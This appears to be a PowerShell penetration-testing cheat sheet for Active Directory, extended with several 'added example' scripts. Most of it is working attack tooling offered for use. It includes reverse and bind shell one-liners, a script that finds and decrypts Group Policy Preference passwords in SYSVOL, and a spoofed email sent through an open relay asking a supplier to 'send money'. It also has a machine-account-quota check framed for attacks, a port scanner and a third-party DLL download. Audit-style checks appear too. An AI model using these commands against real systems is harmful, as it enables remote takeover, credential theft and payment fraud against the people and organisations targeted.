PowerShell
Antimalware Scan Interface (AMSI) bypass generator
Active Directory PowerShell Module
This way the Active Directory PowerShell module can be used portably, without administrator privileges. When running on Azure Virtual Desktop or Azure AD managed devices you will probably get the error message "Unable to find a default server with Active Directory Web Services running." Add the -Server DC01.offsec.nl parameter to your cmdlet. The DLL below is fetched from a third-party GitHub repository, so check that it still carries a valid Microsoft Authenticode signature (Get-AuthenticodeSignature C:\temp\1234hoedjevanpapier.dll) before importing it.
mkdir C:\temp; iwr https://github.com/crypt0rr/filehosting/raw/master/Microsoft.ActiveDirectory.Management.dll -OutFile C:\temp\1234hoedjevanpapier.dll; Import-Module C:\temp\1234hoedjevanpapier.dll
PowerShell: Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
Adjust execution policy
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Check ‘ms-DS-MachineAccountQuota’
Get-ADObject -Identity ((Get-ADDomain).DistinguishedName) -Properties ms-DS-MachineAccountQuota
List users with ‘Store passwords using reversible encryption’ enabled (userAccountControl bit 128 = ENCRYPTED_TEXT_PWD_ALLOWED)
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
Finding cpassword (Group Policy Preferences passwords left in SYSVOL)
findstr /s /n /i /p cpassword $env:logonserver\sysvol\*
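The findstr above only locates the attribute. As an added example (not part of the original page), the script below walks SYSVOL for Group Policy Preference XML files, extracts every cpassword and decrypts it with the static AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4. MS14-025 removed the ability to set new passwords this way, but XML files written before the patch stay in SYSVOL and remain readable by every domain user. The demo at the end builds a constructed Groups.xml under $env:TEMP so it runs without a domain; for a real run call Find-GppPassword without -Path, which defaults to $env:LOGONSERVER\SYSVOL.

```powershell
# Added example, not the page's own code. Paths and the sample XML are constructed.

# Static AES-256 key published by Microsoft for GPP cpassword encryption (MS-GPPREF 2.2.1.1.4).
[byte[]]$GppAesKey = 0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                     0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips the base64 '=' padding; restore it before decoding.
    $padded = $CPassword.PadRight($CPassword.Length + (4 - $CPassword.Length % 4) % 4, '=')
    $cipher = [Convert]::FromBase64String($padded)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $GppAesKey
    $aes.IV = New-Object byte[] 16          # all-zero IV, as specified
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    $aes.Dispose()
    [System.Text.Encoding]::Unicode.GetString($plain)   # password is stored as UTF-16LE
}

function ConvertTo-GppPassword {
    # Inverse of the above; used here only to build the constructed demo file.
    param([Parameter(Mandatory)][string]$Password)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $GppAesKey; $aes.IV = New-Object byte[] 16
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $plain = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)
    $aes.Dispose()
    [Convert]::ToBase64String($cipher).TrimEnd('=')
}

function Find-GppPassword {
    # Default path assumes $env:LOGONSERVER is set (\\DC01 -> \\DC01\SYSVOL).
    param([string]$Path = "$env:LOGONSERVER\SYSVOL")
    Get-ChildItem -Path $Path -Recurse -Include *.xml -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        [regex]::Matches((Get-Content $file.FullName -Raw), '(?i)\bcpassword="([^"]*)"') | ForEach-Object {
            $cp = $_.Groups[1].Value
            [pscustomobject]@{
                File      = $file.FullName
                CPassword = $cp
                # An empty cpassword="" means the policy sets no password; nothing to decrypt.
                Password  = if ($cp) { ConvertFrom-GppPassword $cp } else { '<empty>' }
            }
        }
    }
}

# Demo on a constructed Groups.xml in a fake SYSVOL layout (not real domain data).
$demoDir = Join-Path $env:TEMP 'gpp-demo\Policies\DEMO\Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$demoCp = ConvertTo-GppPassword 'S3cr3tLocalAdmin!'
@"
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin">
    <Properties action="U" cpassword="$demoCp" userName="localadmin"/>
  </User>
</Groups>
"@ | Set-Content -Path (Join-Path $demoDir 'Groups.xml')

Find-GppPassword -Path (Join-Path $env:TEMP 'gpp-demo') | Format-List
```

The regex match is case-insensitive because the attribute appears as cpassword in Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml and Printers.xml with varying casing across tools that wrote them; the decryptor is the same for all of them.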
Get members of specific group
Get-ADGroupMember 'Domain Admins'
Get-ADGroupMember 'Domain Admins' | select SamAccountName
Get logon server details
$env:logonserver
Check which users' home directories you have access to
gci C:\users\*\*
Enable access to C-drive in Explorer
subst z: c:\
Check how many computer objects can be added by a user (the default quota is 10; 0 disables quota-based joins for unprivileged users)
Get-ADObject ((Get-ADDomain).DistinguishedName) -Properties ms-DS-MachineAccountQuota
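The quota value alone does not say whether you can still use it: the DC enforces ms-DS-MachineAccountQuota by counting the computer objects whose mS-DS-CreatorSID equals the caller's SID (objects created by accounts that hold an explicit Create Child right do not get that attribute and do not count). As an added example, not part of the original page, the function below computes the remaining budget for a user. It assumes the AD module, domain connectivity and the DC name DC01.offsec.nl used elsewhere on this page.

```powershell
# Added example, not the page's own code. Requires the AD module and a reachable DC.
function Get-MachineAccountQuotaLeft {
    param(
        [string]$Server = 'DC01.offsec.nl',        # assumed DC name from this page
        [string]$SamAccountName = $env:USERNAME
    )
    $domain = Get-ADDomain -Server $Server
    $quota  = (Get-ADObject -Identity $domain.DistinguishedName -Server $Server `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    $sid    = (Get-ADUser -Identity $SamAccountName -Server $Server).SID

    # Computer objects this SID created through the quota mechanism. SID-syntax attributes
    # accept the SDDL string form in LDAP filters, the same way objectSid does.
    $created = @(Get-ADComputer -Server $Server -LDAPFilter "(mS-DS-CreatorSID=$($sid.Value))" `
                   -Properties 'mS-DS-CreatorSID')

    [pscustomobject]@{
        User      = $SamAccountName
        Quota     = [int]$quota
        Created   = $created.Count
        Remaining = [math]::Max(0, [int]$quota - $created.Count)
        CreatedBy = $created.Name -join ','
    }
}

Get-MachineAccountQuotaLeft
Get-MachineAccountQuotaLeft -SamAccountName 'svc-backup'   # any other user you hold credentials for
```

Remaining is what matters for machine-account attacks: a user with Remaining 0 cannot add another computer object even though the domain-wide quota is non-zero.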
Overview domain admins
Where ‘Password Never Expires’ is set.
Get-ADGroupMember 'Domain Admins' | ForEach-Object {
    Get-ADUser $_.DistinguishedName -Properties PasswordLastSet,PasswordNeverExpires | Select-Object Name,DisplayName,sAMAccountName,PasswordLastSet,PasswordNeverExpires
} | Where-Object { $_.PasswordNeverExpires } | Sort-Object Name | Format-Table -AutoSize
Where ‘Password Never Expires’ is NOT set (PowerView).
# 65536 (0x10000) is the DONT_EXPIRE_PASSWD bit of userAccountControl
Get-NetGroupMember 'Domain Admins' | ForEach-Object {
    Get-NetUser $_.MemberName | Select-Object name,displayname,samaccountname,pwdlastset,accountexpires,useraccountcontrol
} | Where-Object { -not ($_.useraccountcontrol -band 65536) } | Sort-Object name | Format-Table -AutoSize
Check Secure Boot enabled
Confirm-SecureBootUEFI
List users with PasswordNeverExpires enabled
Import-Module ActiveDirectory
Get-ADUser -Filter { PasswordNeverExpires -eq $true -and Enabled -eq $true } -Properties PasswordNeverExpires
List Domain Admins where ‘Account is sensitive and cannot be delegated’ is not set
Import-Module ActiveDirectory
Get-ADGroupMember "Domain Admins" | Get-ADUser -Properties AccountNotDelegated | Where-Object { -not $_.AccountNotDelegated } | select AccountNotDelegated,Name,SamAccountName
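The Domain Admins checks above (password never expires, password age, the delegation-sensitive flag) and the reversible-encryption check earlier on the page each take a separate pass. As an added example, not part of the original page, the function below collects them in one pass, expands nested groups, and emits a Findings column per account. It assumes the AD module, domain connectivity and the DC name DC01.offsec.nl used elsewhere on this page; the 365-day password-age threshold is an arbitrary assumption.

```powershell
# Added example, not the page's own code. Requires the AD module and a reachable DC.
function Get-DomainAdminAudit {
    param(
        [string]$Group = 'Domain Admins',
        [string]$Server = 'DC01.offsec.nl',   # assumed DC name from this page
        [int]$MaxPasswordAgeDays = 365        # assumed threshold
    )
    # -Recursive flattens nested groups; keep only user objects (computers can be members too).
    Get-ADGroupMember -Identity $Group -Recursive -Server $Server |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Server $Server -Properties PasswordLastSet,PasswordNeverExpires,AccountNotDelegated,userAccountControl,LastLogonDate |
        ForEach-Object {
            $ageDays = if ($_.PasswordLastSet) {
                [int](New-TimeSpan -Start $_.PasswordLastSet -End (Get-Date)).TotalDays
            } else { $null }   # PasswordLastSet empty = password must change at next logon
            [pscustomobject]@{
                SamAccountName       = $_.SamAccountName
                Enabled              = $_.Enabled
                PasswordLastSet      = $_.PasswordLastSet
                PasswordAgeDays      = $ageDays
                PasswordNeverExpires = $_.PasswordNeverExpires
                NotDelegated         = $_.AccountNotDelegated
                ReversibleEncryption = [bool]($_.userAccountControl -band 0x80)   # ENCRYPTED_TEXT_PWD_ALLOWED
                LastLogonDate        = $_.LastLogonDate
                Findings             = @(
                    if ($_.PasswordNeverExpires)             { 'PasswordNeverExpires' }
                    if (-not $_.AccountNotDelegated)         { 'NotMarkedSensitive' }
                    if ($_.userAccountControl -band 0x80)    { 'ReversibleEncryption' }
                    if ($ageDays -gt $MaxPasswordAgeDays)    { "PasswordOlderThan${MaxPasswordAgeDays}d" }
                ) -join ','
            }
        } | Sort-Object SamAccountName
}

Get-DomainAdminAudit | Format-Table -AutoSize
# Only the accounts with something to report:
Get-DomainAdminAudit | Where-Object Findings | Format-Table SamAccountName,Enabled,PasswordAgeDays,Findings -AutoSize
```

Run it with -Group 'Enterprise Admins' or 'Administrators' as well; nested membership is where the one-liners above miss accounts.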
Change user agent
iwr <URL> -UserAgent 'Non existing user agent in use'
Enable repository use
For PowerShell 4 and higher. On 5.1 and higher, try Register-PSRepository -Default first; otherwise use the code below. Note that -InstallationPolicy Trusted suppresses the untrusted-repository prompt for every later Install-Module from PSGallery.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -RequiredVersion 2.8.5.208 -Force
Register-PSRepository -Name PSGallery -SourceLocation https://www.powershellgallery.com/api/v2/ -PublishLocation https://www.powershellgallery.com/api/v2/package/ -ScriptSourceLocation https://www.powershellgallery.com/api/v2/items/psscript/ -ScriptPublishLocation https://www.powershellgallery.com/api/v2/package/ -InstallationPolicy Trusted -PackageManagementProvider NuGet
Install-Module $ModuleName -Scope CurrentUser
Copy remote file to local (WinRM)
$ses = New-PSSession -ComputerName DC01 -Credential (Get-Credential)
Copy-Item -FromSession $ses C:\Users\adm-johndo\DC01\secrets.txt Z:\localdisk\secrets.txt
Open relay
Send-MailMessage -From 'Not John Do <finance@offsec.nl>' -To 'supplier@offsec.nl' -Subject 'Please send money' -SmtpServer 'openrelay.offsec.nl'
Download a file from a remote resource
When run from cmd.exe, wrap the command as powershell -c "<command>".
(New-Object System.Net.WebClient).DownloadFile('https://www.7-zip.org/a/7z2201-x64.exe','C:\Users\crypt0rr\Desktop\7z2201-x64.exe')
Shells (reverse/bind)
Both one-liners are meant to be typed at a cmd.exe prompt; from a PowerShell prompt the outer shell would expand the double-quoted $variables before powershell -c ever sees them.
Reverse shell
Connects back to the listener at <TARGET-IP-HERE>:<TARGET-PORT-HERE>, i.e. the host and port where your own listener is waiting.
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<TARGET-IP-HERE>',<TARGET-PORT-HERE>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Bind shell
0.0.0.0 binds to every IP address available on the local system; the shell then waits for one incoming connection on <TARGET-PORT-HERE>.
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<TARGET-PORT-HERE>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Port Scan
PS> Test-NetConnection DC01.offsec.nl -Port 389
ComputerName : DC01.offsec.nl
RemoteAddress : 10.10.10.10
RemotePort : 389
InterfaceAlias : Ethernet
SourceAddress : 10.0.0.4
TcpTestSucceeded : True
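Test-NetConnection checks a single port per call and waits out the full system timeout on filtered ports. As an added example, not part of the original page, the function below does a TCP connect scan over a port list with a per-port timeout; the self-check at the end opens a loopback listener and verifies the scanner reports it open, so it runs without any network. The host name DC01.offsec.nl and the port list are assumptions.

```powershell
# Added example, not the page's own code.
function Test-TcpPorts {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [int[]]$Ports = @(22,53,80,88,135,139,389,443,445,636,3389,5985),   # assumed defaults
        [int]$TimeoutMs = 500
    )
    foreach ($port in $Ports) {
        $open = $false
        $client = New-Object System.Net.Sockets.TcpClient
        try {
            $async = $client.BeginConnect($ComputerName, $port, $null, $null)
            # A refused port completes quickly with Connected=$false; a filtered port
            # never signals and hits the timeout. Only a completed AND connected
            # socket is reported as open.
            $open = $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false) -and $client.Connected
            if ($open) { $client.EndConnect($async) }
        } catch {
            $open = $false      # DNS failure or socket error: treat as closed
        } finally {
            $client.Close()
        }
        [pscustomobject]@{ ComputerName = $ComputerName; Port = $port; Open = [bool]$open }
    }
}

# Self-check without network: listen on a random loopback port and scan it plus port 1.
$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Loopback, 0)
$listener.Start()
$testPort = $listener.LocalEndpoint.Port
$result = Test-TcpPorts -ComputerName 127.0.0.1 -Ports $testPort, 1
$listener.Stop()
$result | Format-Table -AutoSize

# Real use against the assumed DC, showing only open ports:
Test-TcpPorts -ComputerName DC01.offsec.nl | Where-Object Open | Format-Table -AutoSize
```

Connect scans complete the handshake, so every probe shows up in the target's event logs and in any network sensor; keep the port list short when that matters.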